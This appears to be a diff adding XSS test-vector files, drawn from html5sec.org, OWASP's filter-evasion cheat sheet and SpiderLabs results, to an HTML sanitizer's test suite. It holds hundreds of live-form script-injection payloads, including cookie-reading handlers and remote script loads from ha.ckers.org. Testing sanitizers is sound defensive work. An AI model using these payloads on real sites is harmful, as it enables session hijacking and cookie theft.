test 35 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
test 36 <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
test 37 <!--<img src="--><img src=x onerror=alert(1)//">
test 38 <comment><img src="</comment><img src=x onerror=alert(1)//">
# obsolete, FF 3.6 and Opera 11
#test 39_1 <![><img src="]><img src=x onerror=alert(1)//">
test 39_2 <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
test 40 <style><img src="</style><img src=x onerror=alert(1)//">
test 41 <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
test 42 <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
test 43 <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style>
test 44 <style>*[{}@import'test.css?]{color: green;}</style>X
test 45 <div style="font-family:'foo[a];color:red;';">XXX</div>
test 46 <div style="font-family:foo}color=red;">XXX</div>
test 47 <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
test 48 <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
test 49 <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
test 50 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
test 51 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
test 52 <x style="behavior:url(test.sct)">
test 53_1 <xml id="xss" src="test.htc"></xml>
test 53_2 <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
test 54 <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script
test 55_1 <video><source onerror="alert(1)">
test 55_2 <audio><source onerror="alert(1)">
test 56 <video onerror="alert(1)"><source></source></video>
#
# Obsolete.. Firefox 3.6, Chrome 5, Safari 4
#
# test 57 <b <script>alert(1)//</script>0</script></b>
#
# Obsolete Firefox 3.6
#
#test 58 <b><script<b></b><alert(1)</script </b></b>
test 59 <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
# we reject all styles
# test 60 TBD Obfuscation css-properties and values via ignored extra characters
# we reject all styles
# test 61 TBD CSS encoding and escaping
# IE9 parses this as NOT-XSS
# <x ?="foo"/><x foo="><img src=x onerror=alert(1)//"/>
#
#
test 62_1 <x '="foo"><x foo='><img src=x onerror=alert(1)//'>
#
# IE9 parses this as XSS
# <!-- ="foo"><x foo --><img onerror="alert(1)//'" src="x"/>
#
test 62_2 <! '="foo"><x foo='><img src=x onerror=alert(2)//'>
#
# IE9 parses this as XSS as previous
#
test 62_3 <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
# bonus -- correctly detected
test 62_4 <!-- '="foo"><x foo='--><img src=x onerror=alert(2)//'>
# bonus -- quotes reversed
# same as 62_2
test 62_5 <! "='foo'><x foo="><img src=x onerror=alert(2)//">
# bonus - use of backquotes
test 62_5 <! `='foo'><x foo=`><img src=x onerror=alert(2)//`>
# bonus
<!-- "='foo'><x -->"><img src=x onerror=alert(1)//">
<!-- "=foo><x -->"><img src=x onerror=alert(1)//">
<!-- "foo><x -->"><img src=x onerror=alert(1)//">
<!-- "foo'><x -->"><img src=x onerror=alert(1)//">
test 63_1 <embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.↓, GC6↓,
test 63_2 <img src="javascript:alert(2)">
test 63_3 <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.
test 63_4 <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.
test 64_1 <!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
test 64_2 <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
test 65 <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
test 66 <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
test 67 <!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
test 68 <doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
test 69 <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
test 70 <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
test 71 <// style=x:expression\28write(1)\29>
test 72 <form><button formaction="javascript:alert(1)">X</button>
test 73 <event-source src="event.php" onload="alert(1)">
test 74 <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
test 75 <script<{alert(1)}/></script </>
test 76_1 <?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
test 72_2 <!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">
test 77 <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
test 78 <?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
test 79 <object allowscriptaccess="always" data="test.swf"></object>
# test 80 TBD IE6 and halfwidth/fullwidth Unicode characters
test 81 <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
test 82 <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
test 83 <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
test 84 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x
test 85 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
test 86 <script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
test 86 <body oninput=alert(1)><input autofocus>
test 87 <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">
test 88_0 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
test 88_1 <animation xlink:href="javascript:alert(1)"/>
test 88_2 <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
test 88_3 <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
test 88_4 <foreignObject xlink:href="javascript:alert(1)"/>
test 88_5 <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
test 89_1 <set attributeName="onmouseover" to="alert(1)"/>
test 89_2 <animate attributeName="onunload" to="alert(1)"/>
test 90_1 <div style=content:url(test2.svg)></div>
test 90_2 <div style="background:url(test5.svg)">PRESS ENTER</div>
test 90_3 <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>
# test 91
test 91_1 <? foo="><script>alert(1)</script>">
test 91_2 <! foo="><script>alert(1)</script>">
test 91_3 </ foo="><script>alert(1)</script>">
# obsolete Safari 4
#test 91_4 <? foo="><x foo='?><script>alert(1)</script>'>">
# obsolete Opera 11
#test 91_5 <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
test 91_6 <%25 foo><x foo="%25><script>alert(1)</script>">
test 92 <div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
test 93 <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
test 94_1 <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
test 94_2 <svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
test 95_1 <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage>
test 95_2 <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
test 96_1 <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
test 96_2 <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
test 97_1 <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script>
test 97_2 <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
test 98 <div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
test 99 XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>
# <img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
#
# normal case
test 100_0 <img src=x onerror="alert(1)">
# [a]case
test 100_1 <img%09src=x onerror="alert(1)">
test 100_2 <img%0Asrc=x onerror="alert(1)">
test 100_3 <img%0Csrc=x onerror="alert(1)">
test 100_4 <img%0Dsrc=x onerror="alert(1)">
test 100_5 <img%20src=x onerror="alert(1)">
test 100_6 <img%47src=x onerror="alert(1)">
test 100_7 <img%0Bsrc=x onerror="alert(1)">
# [b] case
test 100_8 <img %47src=x onerror="alert(1)">
test 100_9 <img %00src=x onerror="alert(1)">
# [c] case
test 100_10 <img src=x onerror%09="alert(1)">
test 100_11 <img src=x onerror%0A="alert(1)">
test 100_12 <img src=x onerror%0C="alert(1)">
test 100_13 <img src=x onerror%0D="alert(1)">
test 100_14 <img src=x onerror%20="alert(1)">
test 100_15 <img src=x onerror%00="alert(1)">
test 100_16 <img src=x onerror%0B="alert(1)">
# [d] case
test 100_17 <img src=x%09onerror="alert(1)">
test 100_18 <img src=x%0Aonerror="alert(1)">
test 100_19 <img src=x%0Conerror="alert(1)">
test 100_20 <img src=x%0Donerror="alert(1)">
test 100_21 <img src=x%20onerror="alert(1)">
test 100_22 <img src=x%0Bonerror="alert(1)">
# [e] case
test 100_23 <img src=x onerror=%09"alert(1)">
test 100_24 <img src=x onerror=%0A"alert(1)">
test 100_25 <img src=x onerror=%0C"alert(1)">
test 100_26 <img src=x onerror=%0D"alert(1)">
test 100_27 <img src=x onerror=%20"alert(1)">
test 100_28 <img src=x onerror=%00"alert(1)">
test 100_29 <img src=x onerror=%0B"alert(1)">
# <a href="[a]java[b]script[c]:alert(1)">XXX</a>
test 101_x <a href="javascript:alert(1)">XXX</a>
test 101_0 <a href="%00javascript:alert(1)">XXX</a>
test 101_1 <a href="%01javascript:alert(1)">XXX</a>
test 101_2 <a href="%02javascript:alert(1)">XXX</a>
test 101_3 <a href="%03javascript:alert(1)">XXX</a>
test 101_4 <a href="%04javascript:alert(1)">XXX</a>
test 101_5 <a href="%05javascript:alert(1)">XXX</a>
test 101_6 <a href="%06javascript:alert(1)">XXX</a>
test 101_7 <a href="%07javascript:alert(1)">XXX</a>
test 101_8 <a href="%08javascript:alert(1)">XXX</a>
test 101_9 <a href="%09javascript:alert(1)">XXX</a>
test 101_10 <a href="%0Ajavascript:alert(1)">XXX</a>
test 101_11 <a href="%0Bjavascript:alert(1)">XXX</a>
test 101_12 <a href="%0Cjavascript:alert(1)">XXX</a>
test 101_13 <a href="%0Djavascript:alert(1)">XXX</a>
test 101_14 <a href="%0Ejavascript:alert(1)">XXX</a>
test 101_15 <a href="%0Fjavascript:alert(1)">XXX</a>
test 101_16 <a href="%10javascript:alert(1)">XXX</a>
test 101_17 <a href="%11javascript:alert(1)">XXX</a>
test 101_18 <a href="%12javascript:alert(1)">XXX</a>
test 101_19 <a href="%13javascript:alert(1)">XXX</a>
test 101_20 <a href="%14javascript:alert(1)">XXX</a>
test 101_21 <a href="%15javascript:alert(1)">XXX</a>
test 101_22 <a href="%16javascript:alert(1)">XXX</a>
test 101_23 <a href="%17javascript:alert(1)">XXX</a>
test 101_24 <a href="%18javascript:alert(1)">XXX</a>
test 101_25 <a href="%19javascript:alert(1)">XXX</a>
test 101_26 <a href="%1Ajavascript:alert(1)">XXX</a>
test 101_27 <a href="%1Bjavascript:alert(1)">XXX</a>
test 101_28 <a href="%1Cjavascript:alert(1)">XXX</a>
test 101_29 <a href="%1Djavascript:alert(1)">XXX</a>
test 101_30 <a href="%1Ejavascript:alert(1)">XXX</a>
test 101_31 <a href="%1Fjavascript:alert(1)">XXX</a>
test 101_32 <a href="%20javascript:alert(1)">XXX</a>
# B -- other cases are obsolete
test 101_33 <a href="j%00avascript:alert(1)">XXX</a>
# Confirmed in IE8, Does not work in IE9+
test 102 <img src="x` `<script>alert(1)</script>"` `>
test 103 <script>history.pushState(0,0,'/i/am/somewhere_else');</script>
test 104 <svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
test 105 <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
# Safari 4, supported 2005-2010, now obsolete
# test 106 <img src onerror /" '"= alt=alert(1)//">
test 107 <title onpropertychange=alert(1)></title><title title=></title>
test 108_1 <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
test 108_2 <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
test 108_3 <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
# test 109 SVG
test 110_1 <svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
test 110_2 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>
test 111 <div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
test 112 <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
test 113 <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
test 114 <x style="background:url('x[a];color:red;/*')">XXX</x>
test 115_1 <!--[if]><script>alert(1)</script -->
test 115_2 <!--[if<img src=x onerror=alert(2)//]> -->
test 116_1 <import namespace="t" implementation="#default#time2">
test 116_2 <?import namespace="t" implementation="#default#time2">
test 117 <a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
test 118 <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div>
test 119 <iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
test 120 <a href="#" onclick="makePopups()">Spam</a>
# original for SVG masking
# repurposing this as a generic "no SVG"
test 121_1 <svg:svg>
test 121_2 <svg>
test 121_3 <svg:mast id="foo">
test 122 <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
# test 123 "class jacking with jquery" http://html5sec.org/#131, requires scripting
test 124_1 <script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
test 124_2 <script src="\\example.com\foo.js"></script> // Safari 5.0
test 125 <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
test 126_1 <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
test 127_2 <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
test 127_1 <svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
test 127_2 <handler id="y">alert(1)</handler>
test 127_3 <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
test 128 <svg><style>&lt;img/src=x onerror=alert(1)// </b>
test 129_1 <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
test 129_2 <image filter='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
test 130_1 <math href="javascript:alert(1)">CLICKME</math>
test 130_2 <math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
test 130_3 <math><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
# Obsolete FF < 10
#test 131 TBD Drag and Drop http://html5sec.org/#131
test 132_1 <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
test 132_2 <svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image>
test 133 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
test 134_1 <xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(1)//'>
test 134_2 <script> x='<%25' </script> %25>/ alert(2) </script>
test 134_3 XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
test 135 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
# Somewhat odd injection -- ignoring. We can ban dirname is this
# is really a problem
#test 136 <input name="injected" value="injected" dirname="password" />
test 137_1 <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
test 137_2 <svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>

View file

@ -0,0 +1,7 @@
# Mauro Gentile
# https://www.owasp.org/images/7/7c/Gentile_OWASP_EU_Tour_2013.pdf
<input onfocus=write(1) autofocus>
<form id="test" /><button form="test" formaction="javascript:alert(1)">X</button>
<video><source onerror="alert(1)">
<form><button><button form="test" formaction="javascript:alert(1)">X</button>
<script/src=data

View file

@ -0,0 +1,2 @@
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
<scr%00ipt>confirm(0);</scr%00ipt>

View file

@ -0,0 +1,3 @@
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E

View file

@ -0,0 +1,259 @@
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=JaVaScRiPt:alert('XSS')>
# Grave Accent Obfuscation
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
# Malformed A Tags
# (not actually malformed)
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
# Malformed IMG Tags
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
# fromCharCode
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# Default SRC tag to get past filters that check SRC domain
<IMG SRC=# onmouseover="alert('xxs')">
# Default SRC tag by leaving it empty
# nickg; Unable to replicate in FF,Safari,Chrome 2014-01-10
# <IMG SRC= onmouseover="alert('xxs')">
# Default SRC tag by leaving it out entirely
<IMG onmouseover="alert('xxs')">
# Decimal HTML character references
# obsolete?
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="/" onerror=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
# Decimal HTML character references without trailing semicolons
# obsolete
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC="/x" onerror=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
# Hexadecimal HTML character references without trailing semicolons
# obsolete form
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="/" onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
# Embedded tab
# obsolete form
#<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav ascript:alert('XSS');">
# Embedded escaped tab
# obsolete form
#<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="/" onerror="jav&#x09;ascript:alert('XSS');">
# Embedded newline to break up XSS
# obsolete form
#<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
# Embedded CR
# obsolete form
#<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav&#x0D;ascript:alert('XSS');">
# Null
# obsolete form
# <IMG SRC="jav%00ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
# Spaces and meta chars before the JavaScript in images for XSS
# obsolete form
#<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="/x" onerror=" &#14; javascript:alert('XSS');">
# Non-alpha-non-digit XS
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
# this is bogus or obsolete
# <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
# Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
# No closing script tags
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
# Protocol resolution in script tags
<SCRIPT SRC=//ha.ckers.org/.j>
# Half open HTML/JavaScript XSS vector
<IMG SRC="javascript:alert('XSS')"
# Double open angle brackets
<iframe src=http://ha.ckers.org/scriptlet.html <
# Escaping JavaScript escapes
# N/A
# End title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
# INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
# BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
# IMG Dynsrc
# Wildly obsolete
<IMG DYNSRC="javascript:alert('XSS')">
# IMG LOW src
# Wildy obsolete
<IMG LOWSRC="javascript:alert('XSS')">
# List-style-image
# likely obsolete
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
# VBscript in an image
<IMG SRC='vbscript:msgbox("XSS")'>
# Livescript (older versions of Netscape only)
# Obsolete
# <IMG SRC="livescript:[code]">
# BODY tag
<BODY ONLOAD=alert('XSS')>
# BGSOUND
<BGSOUND SRC="javascript:alert('XSS');"
# & JavaScript includes
# Obsolete
# <BR SIZE="&{alert('XSS')}">
# STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
# Remote style sheet
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
# Remote style sheet part 2
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
# Remote style sheet part 3
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
# Remote style sheet part 4
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
# STYLE tags with broken up JavaScript for XSS
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
# STYLE attribute using a comment to break up expression
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"
# IMG STYLE with expression
# N/A
# STYLE tag (Older versions of Netscape only)
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
# STYLE tag using background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
# STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
# Anonymous HTML with STYLE attribute
<XSS STYLE="xss:expression(alert('XSS'))">
# Local htc file
<XSS STYLE="behavior: url(xss.htc);">
# META
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
# META using data
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
# META
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
# IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
# IFRAME Event based
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
# FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
# TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
# TD
<TABLE BACKGROUND="javascript:alert('XSS')">
# DIV background-image
<TABLE BACKGROUND="javascript:alert('XSS')">
# DIV background-image with unicoded XSS exploit
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
# DIV background-image plus extra characters
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
# DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
# "Downlevel-hidden block"
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
# BASE tag
<BASE HREF="javascript:alert('XSS');//">
# Object tag
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
# Using an EMBED tag you can embed a Flash movie that contains XSS
<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf" AllowScriptAccess="always"></EMBED>
# You can EMBED SVG which can contain your XSS vector
